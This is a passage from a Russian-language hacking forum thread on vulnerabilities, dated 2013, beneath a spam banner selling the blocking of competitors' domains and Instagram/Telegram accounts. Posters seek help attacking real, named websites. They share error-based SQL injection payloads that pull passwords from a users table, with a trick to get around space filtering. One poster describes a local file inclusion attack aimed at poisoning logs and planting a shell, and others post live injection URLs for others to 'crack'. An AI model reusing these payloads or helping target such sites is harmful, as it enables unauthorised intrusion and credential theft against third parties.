УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2265 из 2438

2265

Опции темы

Поиск в этой теме

Опции просмотра

#22641

01.08.2013, 20:49

Unknowhacker

Guest

Сообщений: n/a

Провел на форуме:
94006

Репутация: 24

Дело обстоит так.. есть сайт, на котором можно узнать version; database запросом

Код:

Code:
and(extractvalue(1,concat(0x3a,database())))and'

, а для получения пароля нужно выполнить запрос (Источник кн. Дмитрий Евтеев Positive technologies стр. 24)

Код:

Code:
and(extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))and'

задача заключается в том, чтобы обойти ПРОБЕЛЫ .. Знатоки, помогите!

#22642

01.08.2013, 21:11

Грабитель

Guest

Сообщений: n/a

Провел на форуме:
69791

Репутация: -7

Цитата:

Сообщение от Unknowhacker

Unknowhacker said:
Дело обстоит так.. есть сайт, на котором можно узнать version; database запросом

Код:

Code:
and(extractvalue(1,concat(0x3a,database())))and'

, а для получения пароля нужно выполнить запрос (Источник кн. Дмитрий Евтеев Positive technologies стр. 24)

Код:

Code:
and(extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))and'

задача заключается в том, чтобы обойти ПРОБЕЛЫ .. Знатоки, помогите!

select(password)from(tables)where(id=1)

только грешно взломами....

#22643

01.08.2013, 23:25

Unknowhacker

Guest

Сообщений: n/a

Провел на форуме:
94006

Репутация: 24

Цитата:

Сообщение от Грабитель

Грабитель said:
select(password)from(tables)where(id=1)
только грешно взломами....

Переделал на

Код:

Code:
and(extractvalue(1,concat(0x3a,select(password)from(tables)where(id=1))))and'

... не хочет зараза дикая

#22644

02.08.2013, 02:04

vikler

Guest

Сообщений: n/a

Провел на форуме:
36068

Репутация: 0

LFI провожу на сервере, на котором Mac OS X

После двухдневного копания, отрыла логи error_log, не обновлялся с 2010 года, притом судя по последней записи "Defaced", этот лог тогда кто-то явно отравил

В связи с этим вопрос: можно ли на Mac OS x найти некое подобие proc/self/environ ? Где бы писался user-agent?

php://filter работает, но удалось посмотреть исходный код только main.php

Нашла логин, пароль, бд от MySQL sphinx, но дело дохлое: только local host connection

надо лить шелл...но как это сделать на этом *** Mac OS X

#22645

03.08.2013, 13:37

vikler

Guest

Сообщений: n/a

Провел на форуме:
36068

Репутация: 0

Цитата:

Сообщение от OxoTnik

OxoTnik said:
Посмотри другие логи, пути тут http://wiki.apache.org/httpd/DistrosDefaultLayout

не, НЕТУ

мЕНЯ НАСТОРАЖИВАЕТ, что все конфиги updat'ы 2010 года. что это значит? Сайт живой, обновляется просто постоянно, постоянный доступ посетителей....

edit: хотя нет, /var/log/secure.log обновляется сегодняшним днем к примеру

#22646

03.08.2013, 14:10

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

Ничего настораживающего. Рабочие логи, как могут быть в другом месте, так и вовсе быть отключены в целях повышеня производительности. Можно попробовать поискать субдомены, обычно на технических, девелоп и тп сабах логи включены, не требуют тонкого тюнинга и тп.

#22647

03.08.2013, 15:08

vikler

Guest

Сообщений: n/a

Провел на форуме:
36068

Репутация: 0

Цитата:

Сообщение от Cennarios

Cennarios said:
Ничего настораживающего. Рабочие логи, как могут быть в другом месте, так и вовсе быть отключены в целях повышеня производительности. Можно попробовать поискать субдомены, обычно на технических, девелоп и тп сабах логи включены, не требуют тонкого тюнинга и тп.

хм, спасибо, попробую в суб-доменах поискать....

EDIT: в суб-доменах та же херь

#22648

05.08.2013, 15:16

nicols

Guest

Сообщений: n/a

Провел на форуме:
18470

Репутация: 0

Помогите раскрутить

Код:

Code:
http://www.hochuvotpusk.ru:80/info.php?id=41

#22649

05.08.2013, 16:47

seozone

Guest

Сообщений: n/a

Провел на форуме:
10928

Репутация: 0

Ребят, нашёл это: http://rp-gameworld.ru/misc/ что можно сделать с этим?

#22650

05.08.2013, 18:39

Unknowhacker

Guest

Сообщений: n/a

Провел на форуме:
94006

Репутация: 24

Код:

Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

Кто осилит?

Страница 2265 из 2438

2265

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход